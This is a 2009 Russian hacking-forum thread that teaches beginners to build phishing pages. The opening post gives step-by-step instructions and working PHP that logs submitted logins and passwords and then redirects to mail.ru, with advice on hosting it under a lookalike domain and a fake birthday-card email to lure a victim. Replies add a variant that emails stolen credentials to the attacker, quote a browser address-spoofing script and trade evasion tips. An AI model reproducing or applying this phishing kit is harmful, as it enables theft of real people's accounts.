Работаете через Tor? Используйте нашу onion-версию сайта: forum.h4ckorsoftgfvvng.onion
Реклама на hackersoft.ru Реклама на hackersoft.ru

Вернуться   Форумы Hackersoft > Хакерство и безопасность > Для новичков > Социальная инженерия > Фейки
CHAT Регистрация Справка Пользователи Доска почета Календарь Поиск Сообщения за день Все разделы прочитаны

Фейки Фейк - фальшивый веб-сайт, страница или программа, созданная с целью похищения логина и пароля. В разделе обсуждается создание фейков.

Ответ
 
Опции темы
Старый 01.03.2009, 23:52   #1
Kanaris
Администратор 
 
Аватар для Kanaris
 
Регистрация: 24.07.2007
Прописка: Везде, где есть воздух
Сообщений: 1,642
Вес репутации: 76 Kanaris экспертKanaris экспертKanaris экспертKanaris экспертKanaris экспертKanaris экспертKanaris экспертKanaris экспертKanaris экспертKanaris экспертKanaris эксперт
Депозит: 0$
Вы сказали Спасибо: 237
Поблагодарили 1,128 раз(а) в 427 сообщениях
Итак, господа, хочу всем дать самый простой способ создания фейка за 5 минут. По шагам, все будет понятно даже для ламеров. Тут даже хтмл и пхп не нужно знать.
  1. Заходим на страницу, которую мы пытаемся подделать (очевидно, это страница логина). Теперь нам нужно скачать ее. Делается двумя способами.
    1. 1 способ (ламерский). Нажимаем ctrl+s в браузере на этой странице (или в меню Файл - сохранить как... сохраняете страницу на своем кампе. Если после заливки на сервак не будут грузиться картинки - поправляйте (как это делать, я рассказывать не буду, ибо догадается даже олигофрен). Преимущества этого способа - все что нужно сделать, это нажать 3 кнопки и готово.
    2. 2 способ (чуть сложнее, но чище). Нажимаем ctrl+u (в лисе), ctrl+F3 (в опере) или в меню "Вид - Исходный код страницы" (в осле). Открывается окно с исходным кодом страницы. Этот код вы копируете в файл index.php или index.html. Потом прописываем абсолютные пути ко всем картинкам и таблицам стилей (оригинальным). Это чтобы картинки и ЦССки грузились с сервака, страницу которого мы подделываем. Преимущества этого способа перед первым: все чисто, все компактненько в одном файле.
  2. Открываем блокнотом (или др. редактором исходного кода) ваш получившийся файл, ищем теги <form></form>, имеющие отношение к форме логина (иногда на странице бывает несколько форм) и меняем значение аттрибута action на submit.php. Если вы не разбираетесь в HTML, найдите слово action и то, чему оно должно быть равно, установите submit.php (чтобы получилось примерно следующее: action="submit.php"). Сохраняем файл, закрываем.
  3. В той же папке создаем файл submit.php и вписываем туда следующее содержимое:
    Код:
    <?php
    
    /**
     * @author hackersoft
     * @copyleft 2009
     */
    
    @include 'config.php';
    $req=array(
    	'HTTP_REFERER'=>$_SERVER['HTTP_REFERER'],
    	'HTTP_USER_AGENT'=>$_SERVER['HTTP_USER_AGENT'],
    	'REMOTE_ADDR'=>$_SERVER['REMOTE_ADDR'],
    	'REMOTE_PORT'=>$_SERVER['REMOTE_PORT'],
    	'REQUEST_URI'=>$_SERVER['REQUEST_URI'],
    	'REQUEST_TIME'=>$_SERVER['REQUEST_TIME'],
    );
    $desc=fopen('logs.txt','at+');
    fwrite($desc,print_r($req,true)."\n\n\n".print_r($_REQUEST,true)."\n\n\n=====================\n\n\n");
    fclose($desc);
    
    header('Location: '.$loc);
    
    ?>
    затем сохраняем и закрываем.
  4. Создаем файл config.php, и копируем в него текст:

    Код:
    <?php
    
    /**
     * @author hackersoft
     * @copyleft 2009
     */
    
    // куда редиректить после записи пароля:
    $loc='http://mail.ru/cgi-bin/start';
    
    ?>
    (не забудьте адрес поменять на нужный). Сохраняем и закрываем.
  5. Создаем пустой файл logs.txt.
  6. Ну вот, фейк готов, теперь его осталось залить и впарить жертве. Для этого регим акк на сайте http://freehostia.com (бесплатный хостер с пхп без баннеров). Называем сайт как-нибудь типа mai1-ru-.freehostia.com.
  7. Заливаем по FTP (или через панель управления) те файлы, которые вы создали.
  8. Установите на файл logs.txt привилегии "777" (ибо пароль жертвы не запишется).
  9. Теперь фейк можно впарить жертве. Напишите письмо вида:
    Цитата:
    Привет маша! Поздравляю тебя с днем рождения и вручаю тебе эту открытку:
    http://mai1-ru-.freehostia.com/
    Маша зайдет на страницу http://mai1-ru-.freehostia.com/ и увидит форму ввода логина и пароля, как будто она разлогинелась. Если она глупая и ничего не заметит (а это уже отдельная тема, как фейк сделать менее палевным), она введет логин и пароль которые запишутся в файл logs.txt в следующем формате:
    Код:
    Array
    (
        [HTTP_REFERER] => http://hackersoft.ru/admin/
        [HTTP_USER_AGENT] => Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
        [REMOTE_ADDR] => 92.112.88.666
        [REMOTE_PORT] => 34953
        [REQUEST_URI] => /admin/?action=articles
        [REQUEST_TIME] => 1230097894
    )
    
    Array
    (
        [login] => (здесь логин маши)
        [password] => (а здесь пароль)
    )
    
    =====================

Вот и сказочке конец, а кто слушал - молодец. Будут вопросы - оставляйте в теме, но я надеюсь что все написано так, что и ежу понятно.

p.s. Этот способ универсальный, подойдет не только для mail.ru или vkontakte.ru, а вообще, для чего угодно.
Kanaris вне форума   Ответить с цитированием
Старый 03.03.2009, 06:50   #2
[email protected]
advanced 
 
Аватар для odr@dek
 
Регистрация: 22.06.2008
Сообщений: 385
Вес репутации: 14 odr@dek специалистodr@dek специалистodr@dek специалистodr@dek специалистodr@dek специалистodr@dek специалист
Депозит: 0$
Вы сказали Спасибо: 31
Поблагодарили 246 раз(а) в 128 сообщениях
Пка читал, мозг сломал \=
А чо через инклуд(те через жэ)? А чо не require ? Оо!
А чем не устраивает один файло, без всяких инклудов?
Цитата:
<?PHP
$Login = $_POST['login'];
$Domain = $_POST['domain'];
$Browser = getenv("HTTP_USER_AGENT");
$Port = getenv("REMOTE_PORT");
$Connect = $_SERVER['HTTP_CONNECTION'];
$Host = gethostbyaddr(getenv("REMOTE_ADDR"));
$Pass = $_POST['password'];
$ip = $_SERVER["REMOTE_ADDR"];
$Data = date("d-m-y H:i:s", time(((;

$text = "[$Data] Browser:[$Browser] Port:[$Port] Connect:[$Connect] Host:[$Host] IP:$ip Мыло:[email protected]$Domain Пасс:$Pass";
$to = "[email protected]"; // Сдесь Ваш ящег
$sub = " Pass lamera: [email protected]$Domain";
mail($to,$sub,$text);

$filelog = fopen("base.php","a+");
fwrite($filelog,"\n $text \n");
fclose($filelog);

echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http:// Суда пайдет ламер'></head></html>"; // Урл куда пашлете клиента...
?>
Кстате,
Цитата:
Этот способ универсальный, подойдет не только для mail.ru
на мале присутствуют доменные имена для мыл, сталобыть ужэ не универсальный, те есле оставеть строку:
$Domain = $_POST['domain'];
то хост выдаст ошипку в третей строке, те ужэ палево \=

зы Тут о фейках ужэ столько разжеванно, что инклюдом ты просто заморочеш голову и буит очередная ветка не о чом, имхо кароч.

Цитата:
менее палевным-просто подменим отображаемый адрес.
Жжош! научика подменить адрессную строку! Олололо!
иле след статья буит об инжэктах?

Мудр тот, кто знает не многое, а нужное.
Эсхил
odr@dek вне форума   Ответить с цитированием
Старый 04.03.2009, 04:01   #3
[email protected]
advanced 
 
Аватар для odr@dek
 
Регистрация: 22.06.2008
Сообщений: 385
Вес репутации: 14 odr@dek специалистodr@dek специалистodr@dek специалистodr@dek специалистodr@dek специалистodr@dek специалист
Депозит: 0$
Вы сказали Спасибо: 31
Поблагодарили 246 раз(а) в 128 сообщениях
Цитата:
взято с хакера-
Канар, штоле взял? и Коипста не паставел?

morty10
Па_ходу Вы не понеле о чом_заикнулесь...
Цитата:
Kaк ты знaeшь, пpи нaвeдeнии yкaзaтeля мышки нa линк в oкнe бpayзepa, в cтpoкe cocтoяния oтoбpaжaeтcя aдpec, нa кoтopый yкaзывaeт ccылкa.
Это основы хтмл и Омерику Вы не открыле.! Тут и не пахнед падменой адрессной строки...
Спуфинг, реалезуем посредством Явы, "Juan" отписал это хз когда... и то на счет IE7
http://marc.info/?l=bugtraq&m=120673515616258&w=2 и то на всплывающее окно...
Цитата:
]nternet explorer 7.0 spoofing by Juan Pablo Lopez Yacubian

<script language="JavaScript">
function iniciar()
{

nuevaventana = window.open("", "Win", "width=500,height=500,location=1");

nuevaventana.document.location = "http://www.google.com.ar/#" + "www.microsoft.com/";

}
iniciar()
</script>


<!-- following code added by server. PLEASE REMOVE -->
<script language="JavaScript" src="http://es.geocities.com/js_source/ygNSLib9.js?v3"></script><script language="JavaScript">var yvnContents='http://geocities.yahoo.com/themis/as.php?cc=es&s=382026089&l=NE&b=0&t=1206900486';yv nR='es';yfnEA(0);</script>
<!-- preceding code added by server. PLEASE REMOVE --><!-- text below generated by server. PLEASE REMOVE --></object></layer></div></span></style></noscript></table></script></applet><script language="JavaScript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"></script><script language="JavaScript" src="http://us.js2.yimg.com/us.js.yimg.com/lib/smb/js/hosting/cp/js_source/geov2_001.js"></script><script language="javascript">geovisit();</script><noscript><img src="http://visit.geocities.yahoo.com/visit.gif?es1206900486" alt="setstats" border="0" width="1" height="1"></noscript>
<IMG SRC="http://geo.yahoo.com/serv?s=382026089&t=1206900486&f=es-w88" ALT=1 WIDTH=1 HEIGHT=1>
Скопируйте, и Вы паймете о чем речь...=\

Далее, подмена реализуема тока путем инжэкта те виря, на сення поп "Зевс"...
Вам, для ночала это...
_http://exploit.in/forum/index.php?showtopic=16331&st=0
зы. Перекур бамбука...
зы.зы... Бухие мы щя кароч..\=

Мудр тот, кто знает не многое, а нужное.
Эсхил

Последний раз редактировалось [email protected], 04.03.2009 в 04:12.
odr@dek вне форума   Ответить с цитированием
Старый 15.03.2009, 21:54   #4
prostouser
newbie 
 
Регистрация: 15.03.2009
Сообщений: 4
Вес репутации: 0 prostouser новичек
Депозит: 0$
Вы сказали Спасибо: 3
Поблагодарили 0 раз(а) в 0 сообщениях
сейчас последует вообще убийственный вопрос:

Нужно ли скрывать ИП при использовании фейков?)
prostouser вне форума   Ответить с цитированием
Старый 15.03.2009, 22:00   #5
KollinZ
professional 
 
Аватар для KollinZ
 
Регистрация: 09.01.2009
Сообщений: 1,833
Вес репутации: 42 KollinZ специалистKollinZ специалистKollinZ специалистKollinZ специалистKollinZ специалистKollinZ специалист
Депозит: 0$
Вы сказали Спасибо: 382
Поблагодарили 373 раз(а) в 233 сообщениях
Цитата:
Сообщение от prostouser Посмотреть сообщение
сейчас последует вообще убийственный вопрос:

Нужно ли скрывать ИП при использовании фейков?)
Если ты используешь спам рассылку через другие акки то, да (на the bate ip видно)
KollinZ вне форума   Ответить с цитированием
Благодарности KollinZ от:
Старый 15.03.2009, 23:24   #6
NeRoN
i`m very funny 
 
Регистрация: 16.10.2008
Сообщений: 369
Вес репутации: 11 NeRoN продвинутыйNeRoN продвинутыйNeRoN продвинутыйNeRoN продвинутый
Депозит: 0$
Вы сказали Спасибо: 156
Поблагодарили 100 раз(а) в 51 сообщениях
Мне кажется что лутше будет если в фек засунуть функцию чтобы он шёл на страницу и водил там имя и пароль который ламер ввёл в фейке, чтобы ламер ничё не заподозрил...

Последний раз редактировалось Lacerta, 15.03.2009 в 23:43.
NeRoN вне форума   Ответить с цитированием
Старый 16.03.2009, 01:05   #7
Kanaris
Администратор 
 
Аватар для Kanaris
 
Регистрация: 24.07.2007
Прописка: Везде, где есть воздух
Сообщений: 1,642
Вес репутации: 76 Kanaris экспертKanaris экспертKanaris экспертKanaris экспертKanaris экспертKanaris экспертKanaris экспертKanaris экспертKanaris экспертKanaris экспертKanaris эксперт
Депозит: 0$
Вы сказали Спасибо: 237
Поблагодарили 1,128 раз(а) в 427 сообщениях
Цитата:
Сообщение от prostouser Посмотреть сообщение
сейчас последует вообще убийственный вопрос:

Нужно ли скрывать ИП при использовании фейков?)
да, действительно вопрос вообще убийственный.
чей айпи скрывать и от кого? свой айпи от ламера? (это сайт, айпи и так не спалится) или айпи ламера от себя?
Kanaris вне форума   Ответить с цитированием
Старый 16.03.2009, 08:47   #8
prostouser
newbie 
 
Регистрация: 15.03.2009
Сообщений: 4
Вес репутации: 0 prostouser новичек
Депозит: 0$
Вы сказали Спасибо: 3
Поблагодарили 0 раз(а) в 0 сообщениях
ну как бе... заливаешь же файлы на сайт, там домен, все дела... мож там админы ип видят. Это имел ввиду.
Ну фейк то уже сделал, успешно, пришлось правда поспамить тупыми вопросами в асю Блудферру. Большое ему спасибо за терпение. Хотя поржал он наверное вдоволь

Такшо учусь...все когда-то нубами были
prostouser вне форума   Ответить с цитированием
Старый 25.03.2009, 15:52   #9
Vanya-San
newbie 
 
Аватар для Vanya-San
 
Регистрация: 23.03.2009
Сообщений: 16
Вес репутации: 1 Vanya-San новичек
Депозит: 0$
Вы сказали Спасибо: 0
Поблагодарили 1 раз в 1 сообщении
у меня три вопроса
1)как нормально зарегить акк? там только платно(или напиши последовательность действий)
2)можно ещё гдето зарегить, только чтоб на русском языке и бесплатно.
3)как понять? "привелегии 777" как сделать?
Vanya-San вне форума   Ответить с цитированием
Старый 25.03.2009, 16:00   #10
m33
professional 
 
Аватар для m33
 
Регистрация: 30.08.2008
Прописка: 127.0.0.1
Сообщений: 1,495
Вес репутации: 44 m33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионалm33 профессионал
Депозит: 0$
Вы сказали Спасибо: 109
Поблагодарили 609 раз(а) в 351 сообщениях
1. на фрихостии все бесплатно (выбирай шоколад)
2. холм.ру
3. права доступа к файлу (запись, чтение и т.д.)

Я няшка.
m33 вне форума   Ответить с цитированием
Благодарности: 2
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы

Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.


Часовой пояс GMT +4, время: 09:44.


© 2005 — +∞ Hackersoft. Все и вся защищены.
Публичная оферта | Правила форума | Реклама на сайте
Powered by vBulletin®©™ Jelsoft®©™ Enterprises Ltd. Перевод: zCarot.
Реклама на hackersoft.ru Реклама на hackersoft.ru